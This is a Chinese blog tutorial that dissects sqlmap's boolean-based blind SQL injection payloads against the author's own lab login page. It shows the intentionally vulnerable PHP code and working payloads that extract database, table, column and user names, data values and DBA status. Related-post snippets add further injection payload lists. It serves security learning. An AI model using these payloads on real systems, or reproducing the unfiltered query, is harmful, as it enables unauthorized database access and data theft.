SQL注入:sqlmap布尔型盲注payload解析

最新推荐文章于 2024-04-18 10:11:14 发布
最新推荐文章于 2024-04-18 10:11:14 发布
阅读量3.8k 收藏 5
点赞数 5
分类专栏: Web安全 文章标签: sql web安全 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43249758/article/details/102267466
版权

文章目录

靶机环境

CentOS 7 + Apache + PHP + MySQL

注入点

登录页面布尔型盲注
php文件如下

<?php
        include "public.php";
        //连接数据库
        $uname=$_REQUEST["yonghuming"];
        $pass=$_REQUEST["mima"];
        //提取从login.html中POST的键值对

        $sql="SELECT username,password FROM userpass WHERE username='$uname'";
        //在userpass表中查找符合条件的一行username password

        $re=mysqli_query($conn,$sql);

        $n=mysqli_num_rows($re);
        //返回的行数
        
        if(!$n){
                echo "<script>alert('用户名不存在!')</script>";
        }
        else{
                while($data=mysqli_fetch_assoc($re)){
						if($data['username']==$uname&&$data['password']==$pass){
                        //如果查询出的data的['username']的值与传入的uname的值相等且...相等
                                echo "<script>alert('登录成功,返回首页');location.href='index.html'</script>";}
                        else{
                        //密码的值与数据库中值不匹配
                                echo "<script>alert('用户名或密码错误,请重试');location.href='login.html'</script>";
                        }
                }
        }
?>

数据库是用root账户连接的
没有任何过滤
选择yonghuming作为注入点
sqlmap加参数-v 3可以看到测试payload

配餐

搭配此博客食用效果更佳
SQL注入:常用函数及子句等

–dbs

第一轮payload猜解数据库个数

a' AND 
ORD(
	MID(
		(SELECT 
			IFNULL(
				CAST(
					COUNT(
						DISTINCT(schema_name)
					) 
				AS CHAR)
			,0x20) 
		FROM INFORMATION_SCHEMA.SCHEMATA)
	,1,1)
)>51 
AND 'nUSA'='nUSA

retrieved 5//得到数据库个数

解析

  1. INFORMATION_SCHEMA是“数据库的数据库”,其用于存储数据库名、表名、列的数据类型、访问权限等,其SCHEMATA表中有当前所有的数据库信息,表中schema_name字段存放所有的数据库名
  2. DISTINCT(schema_name) 选出所有不同名的数据库名 (实际5个)
  3. COUNT统计数据库个数 5
  4. CAST将 个数 转换为CHAR型数据 ‘5’
  5. IFNULL:如果转换后不为空则返回此CHAR型数据,否则返回20(HEX)
  6. SELECT指明对哪个数据库的哪个表进行查询
  7. MID提取此CHAR型数据的第一个字符 ‘5’,如果是20(HEX)则对应返回空格字符
  8. ORD返回此字符(串)的第一个字符的ASCII值53,如果是20(HEX)则对应返回32
  9. 如果返回32,则32>51不成立,数据库个数为0个
  10. 实际测试的payload就是不断改变>后的数值,判断是否成立,直到得到真实的数据库个数
  11. 如果有好几位(比如三)位数的数据库就变为MID(,2,1) MID(,3,1)等逐位猜解数字
    在这里插入图片描述

第二轮payload猜解数据库名

a' AND 
ORD(
	MID(
		(SELECT 
			DISTINCT(
				IFNULL(
					CAST(schema_name AS CHAR)
				,0x20)
			) 
		FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1)
	,1,1)
)>96 
AND 'chdl'='chdl

retrieved phptest//数据库名

解析

  1. CAST将schema_name转换为CHAR型数据
  2. IFNULL:如schema_name列下值为空则返回0x20
  3. DISTINCT选所有不同名的数据库名
  4. SELECT … LIMIT 0,1返回从索引为0开始的一条记录(即第一条,实际数据库名是phptest)
  5. MID提取此字符串 ‘phptest’ 的第一个字符
  6. ORD>96/97/98…猜解此字符,结果为p
  7. 猜出来以后改为MID(,2,1)猜解第二个字符h…
  8. 一条记录centos_test全部猜解出来后改为LIMIT 1,1 开始逐个字符猜解第二条记录
  9. 以此类推得到全部数据库名

实际测试payload
在这里插入图片描述在这里插入图片描述

-D phptest --tables

第一轮payload猜解表的个数

a' AND 
ORD(
	MID(
		(SELECT 
			IFNULL(
				CAST(COUNT(table_name) AS CHAR)
			,0x20) 
		FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x70687074657374)
	,1,1)
)>51 
AND 'dUQC'='dUQC

retrieved 1 //此库中表的个数

解析

  1. table_schema是TABLES表中的一个字段,存放数据库名,0x70687074657374正对应数据库名phptest七个字符的ASCII值(HEX)
  2. 如果表数为多位数就改变MID(,2,1) MID(,3,1)等逐位猜解
  3. 其余原理类似上面猜解数据库个数

实际测试payload
在这里插入图片描述第二轮payload猜解表名

a' AND 
ORD(
	MID(
		(SELECT 
			IFNULL(
				CAST(table_name AS CHAR)
			,0x20) 
		FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x70687074657374 LIMIT 0,1)
	,1,1)
)>96
AND 'lWxK'='lWxK

retrieved userpass

解析
改变 > 后的值和MID(,X,1)逐位猜解字符

实际测试payload
在这里插入图片描述

-D phptest -T userpass --columns

第一轮payload猜解列数

a' AND 
ORD(
	MID(
		(SELECT 
			IFNULL(
				CAST(
					COUNT(column_name)
			 	AS CHAR)
			 ,0x20) 
		FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657270617373 AND table_schema=0x70687074657374)
	,1,1)
)>51
AND 'fMsG'='fMsG

retrieved 2

解析
table_name=0x7573657270617373对应userpass八个字符的ASCII值(HEX)

第二轮payload猜解列名

a' AND 
ORD(
	MID(
		(SELECT 
			IFNULL(
				CAST(column_name AS CHAR)
			,0x20)
		 FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657270617373 AND table_schema=0x70687074657374 LIMIT 0,1)
	,1,1)
)>48 
AND 'RAwU'='RAwU

retrieved username

解析
逐位猜解八个字符username

第三轮payload猜解字段类型

a' AND 
ORD(
	MID(
		(SELECT 
			IFNULL(
				CAST(column_type AS CHAR)
			,0x20) 
		FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657270617373 AND column_name=0x757365726e616d65 AND table_schema=0x70687074657374)
	,1,1)
)>41 
AND 'mPmD'='mPmD

retrieved varchar(100)

解析
逐位猜解十二个字符 varchar(100)

-D phptest -T userpass -C username --dump

第一轮payload猜解数据个数

a' AND 
ORD(
	MID(
		(SELECT 
			IFNULL(
				CAST(COUNT(*) AS CHAR)
			,0x20) 
		FROM phptest.userpass)
	,1,1)
)>51 
AND 'soxV'='soxV

retrieved 20

解析
没什么好解析的

第二轮payload猜解数据值

a' AND 
ORD(
	MID(
		(SELECT 
			IFNULL(
				CAST(username AS CHAR)
			,0x20) 
		FROM phptest.userpass ORDER BY username LIMIT 0,1)
	,13,1)
)>100 
AND 'QtoF'='QtoF

retrieved "adasf"

–current-user

一轮payload猜解当前用户名

a' AND 
ORD(
	MID((
		IFNULL(
			CAST(CURRENT_USER() AS CHAR)
		,0x20)
	),1,1)
)>64 
AND 'PqzR'='PqzR

解析
逐个字符猜解当前用户名

–current-db

一轮payload猜解当前数据库名

a' AND 
ORD(
	MID((
		IFNULL(
			CAST(DATABASE() AS CHAR)
		,0x20)
	),7,1)
)>114 
AND 'Nwcd'='Nwcd

解析
逐个字符猜解当前数据库名

–is-dba

一轮payload查询是否为dba

a' AND 
(
	SELECT (
		CASE WHEN (
			(SELECT super_priv FROM mysql.user WHERE user=0x726f6f74 LIMIT 0,1)
		=0x59) 
	THEN 1 ELSE 0 END)
)=1 
AND 'wANf'='wANf

解析
user=0x726f6f74 正对应当前用户名root的ASCII(HEX)

–users

当前用户有权限读取包含所有用户的表的权限,所以可用此选项列出所有管理用户

a' AND 
ORD(
	MID(
		(SELECT 
			IFNULL(
				CAST(
					COUNT(DISTINCT(grantee)
				) AS CHAR)
			,0x20) 
		FROM INFORMATION_SCHEMA.USER_PRIVILEGES)
	,2,1)
)>48 
AND 'eGCC'='eGCC

总结

LIMIT X,1 代表操作索引为X的一条记录,X从0开始

MID X,1 代表操作某个字符串的第X位,X从1开始

ORD ()>X 代表正在判断某个字符是不是ASCII值为X的字符

流程
猜个数(数据库、库中表、表中列、列中值)
猜类型(表中列)
猜值(库名、表名、列名、列中值)

无名J0kзr
关注
  • 5
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
sqlmap sql 注入测试工具
03-06
sqlmap 可以很方便的测试sql 注入 安装后直接使用
sqlmap payload简单分析(B E T U S)
12-01
介绍了sqlmap几种注入方式 博客地址: http://blog.csdn.net/think_ycx/article/details/51453855
SQLi LABS Less 15 布尔盲注_sqli-labs 15 为何 要输入 用户名
最新发布
2401_83974412的博客
04-18 250
字符的ASCLL码肯定大于1,页面正常显示(登录成功),确定payload可用。测试成功后,再按照此方法测试其余字符,人工测试效率较低,稍后使用脚本自动化枚举。截取当前使用数据库名字的第一个字符,并转换为ASCLL(方便脚本测试)。长度肯定大于1,页面正常显示(登录成功),确定payload可用。依次递增长度进行测试,手动判断效率太低,稍后使用脚本自动化猜解。由此可以判断,网站存在注入,注入点为单引号字符注入。密码随便输入:1,页面正常显示(登录成功)密码随便输入:1,页面异常显示(登录失败)
13、SQL注入——SQL盲注
qq_55202378的博客
12-05 285
SQL注入过程中,SQL语句执行后,选择的数据不能回显到前端页面,此时还需要利用一些方法进行判断或尝试,这个过程称之为盲注。在盲注中,攻击者根据其返回页面的不同来判断信息(可能时页面内容的不同,也可能时响应时间的不同)。一般情况下,盲注可分为两种:基于布尔盲注某些情况下,页面返回的结果只要两种(正常或者错误)。通过构造SQL判断语句,查看页面的返回结果(True 或False)来判断哪些SQL判断条件成立,通过此来获取数据库中的数据。基于时间的盲注
SQL注入-盲注布尔盲注与时间盲注
热门推荐
LJH1999ZN的博客
02-10 1万+
一、什么是盲注 盲注就是在sql注入过程中,sql语句执行select之后,可能由于网站代码的限制或者apache等解析器配置了不回显数据,造成在select数据之后不能回显到前端页面。此时,我们需要利用一些方法进行判断或者尝试,这个判断的过程称之为盲注。 通俗的讲就是在前端页面没有显示位,不能返回sql语句执行错误的信息,输入正确和错误返回的信息都是一致的,这时候我们就需要使用页面的正常与不正常显示来进行sql注入。 二、盲注的分类 基于布尔盲注 基于时间类盲注 三、利用盲注
SQL注入Playload List
qq_52014772的博客
07-22 1120
SQL注入是一个网络安全漏洞,它使攻击者能够干扰应用程序对其数据库的查询。 SQL注入 描述 In-band SQLi (Classic SQLi) In-band SQLi注入是SQL注入攻击中最常见和最容易利用的。当攻击者能够使用相同的查询发起攻击并收集结果时,就会发生In-band SQLi注入。In-band SQLi注入的两种最常见类是基于错误的SQLi和基于联合的SQLi。 Error-based SQLi 基于错误的SQLi是一种In-band..
sql注入payload总结
recover517的博客
03-04 8562
个人经验加网上的wp总结的注入类,附上sqlmap命令
Web应用手工渗透测试——用SQLMap进行SQL盲注测试
02-26
本文主要关注SQL注入,假设读者已经了解一般的SQL注入技术,在我之前的文章中有过介绍,即通过输入不同的参数,等待服务器的反应,之后通过不同的前缀和后缀(suffixandprefix)注入到数据库。本文将更进一步,讨论SQL...
sql注入工具sqlmap源代码+常用指令
04-09
SQLMap是一款流行的开源SQL注入工具,用于自动化检测和利用Web应用程序中的SQL注入漏洞。它可以测试目标站点是否存在SQL注入漏洞,并探测数据库类、操作系统、表名、列名等信息,进而将这些信息自动化地利用来获取...
sql注入扫描_sqlmap-1.1.3.zip
02-13
5. **优化与效率**:SQLMap使用多种技术提高扫描速度和成功率,例如盲注、时间基注入、错误注入等,这些方法可以在不引发警报的情况下进行悄无声息的探测。 在sqlmapproject-sqlmap-c1c7ea3这个文件中,包含了...
SQL_Injection_PayloadSQL注入有效负载列表
01-28
11. **工具与扫描器**:标签中提到的“vulnerability-detection”和“vulnerability-scanners”是指用于检测SQL注入的自动化工具,如OWASP ZAP、Nessus、SQLMap等,它们可以帮助开发者发现并修复潜在的SQL注入漏洞。...
SQL注入布尔盲注完整解析
qq_28092985的博客
11-06 2077
这里写自定义目录标题注入原理实战利用函数解释sqli-labs-Less5初级使用(length + ascii + substr)进阶使用(length + ascii + substr + limit)总结 注入原理 布尔盲注在注入时无回显的情况下适用,原理是应用系统在根据where+and语句进行查询时进行布尔判断即结果真或假,例如select * from admin where id=1 and 1=1,一般查询中应用系统仅接受 id变量值去拼接sql语句进行查询,但使用过union联合查询的小伙
sql server 字段密码解密_SQL注入漏洞测试
weixin_39927059的博客
12-07 959
SQL注入漏洞测试 --Write Up题目用到的工具AES加密网站:http://tool.chacuo.net/cryptaesBASE64加密网站:https://www.sojson.com/base64.htmlMD5加密网站:https://www.cmd5.com/1.靶场https://www.mozhe.cn/bug/deta...
sqlmap使用
wanan的博客
10-09 3274
sqlmap使用
pikachu-SQL注入
qq_43660551的博客
05-11 1327
发现kobe’ and if((substr(database(),1,1))=‘p’,sleep(5),null)#时,延迟了,就这样慢慢尝试,或者拿bp弄字典跑跑啥的。用load_file()之前务必先看secure_file_priv=“”。看看数据库名的长度:name=kobe’ and length(database())>=7#,这里需要url编码,即:name=kobe’+and+length(database())>%3d7%23&submit=%E6%9F%A5%E8%AF%A2。
SQL注入漏洞测试(布尔盲注)初级篇
waxcj的博客
03-25 3790
作为一个信安小白,最近在自学SQL注入,下图是该靶场环境(靶场是墨者学院的一个初级靶场) 进入这个sql靶场先观察网站的url发现并没有什么有用的信息,随后就观察网站的其他信息,发现网站除了登录界面下面还有一串滚动的消息“关于平台停机维护的通知”随后我便点了进去,终于找到了有价值的信息 仔细观察一下网站url发现了许多可用的信息,随后我就迫不及待的打开了下载好的sqlmapSqlmap 是一个自动化的 SQL 注入工具,其主要功能是扫描、发现并利用给定的 Url 的 Sql 注入漏洞,目前支.
sqlmap布尔盲注怎么_SQL注入布尔盲注漏洞实战
weixin_33252222的博客
01-28 2304
实训目标1、掌握SQL注入原理;2、了解MySQL的数据结构;3、了解布尔盲注相关语句;解题方向1、通过布尔盲注得到后台账号,从而获得key。主界面:维护界面:经过测试,确定注入点在维护界面的URL链接的id参数中,但是没有报错回显,故而要通过盲注来进行判断。手工注入:利用布尔盲注,来进行爆库:首先是爆数据库名:payload1(布尔盲注):?id=1 orif(ascii(substr...
最常见的SQL报错注入函数(floor、updatexml、extractvalue)及payload总结
Welcome To Myon'Blog !
12-24 4098
extractvalue() 能查询字符串的最大长度为 32,如果我们想要的结果超过 32,就要用 substring() 函数截取或 limit 分页,一次查看最多 32 位。其实有时候我们可以使用group_concat()将所以查询内容列出,但是要取决于题目具体环境,如果无法使用,则使用limit语句来限制查询结果的列数,逐条查询。但是这里回显要么存在,要么无回显,因此无法使用联合查询注入,而且也不存在回显为真或者假两种情况,排除掉盲注,那么这关需要使用的是报错注入。
WEB安全SQL注入 payload
qq_42322144的博客
12-16 2994
'"!@#)\(/?; ' " OR 1=1 OR 1=0 OR 1=1 -- OR 1=0 -- ' OR '1'='1 ' OR '1'='0 ' OR 1=1 -- ' OR 1=0 -- " OR "1"="1 " OR "1"="0 " OR 1=1 -- " OR 1=0 -- ") OR 1=1 -- ") OR 1=0 -- ') OR 1=1 -- ') OR 1=0 -- AND 1=1 AND 1=0 AND 1=1 -- AND 1=0 --
sqlmap布尔盲注
08-10
布尔盲注是一种利用布尔逻辑运算进行SQL注入的技术。在布尔盲注中,攻击者通过构造特定的SQL语句,通过判断某个条件的真假来获取数据库中的信息。 SQLMap是一款常用的自动化SQL注入工具,可以帮助安全测试人员快速发现和利用SQL注入漏洞。在使用SQLMap进行布尔盲注时,你需要提供目标URL、参数名、注入点等信息。SQLMap将自动发送不同的SQL语句,根据程序返回的结果来判断条件是否成立,并进一步推测数据库中的信息。 下面是使用SQLMap进行布尔盲注的一般步骤: 1. 执行基本扫描:通过指定目标URL和参数名,执行基本的SQL注入扫描,以确定是否存在注入漏洞。 2. 确定注入点:如果基本扫描成功,SQLMap将会尝试确定具体的注入位置。 3. 进行布尔盲注:在确认注入点后,SQLMap将自动生成相应的布尔盲注语句,并发送给目标服务器。通过观察服务器返回的页面内容或响应码,SQLMap将根据条件的真假来判断数据库中的信息。 4. 获取数据库信息:如果布尔盲注成功,SQLMap可以继续获取数据库的表名、列名、数据等敏感信息。 需要注意的是,使用SQL注入工具进行测试时,请确保已经得到合法授权,并遵守法律和道德规范。此外,使用自动化工具可能会对目标服务器造成不必要的负载,所以在使用时应谨慎操作。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值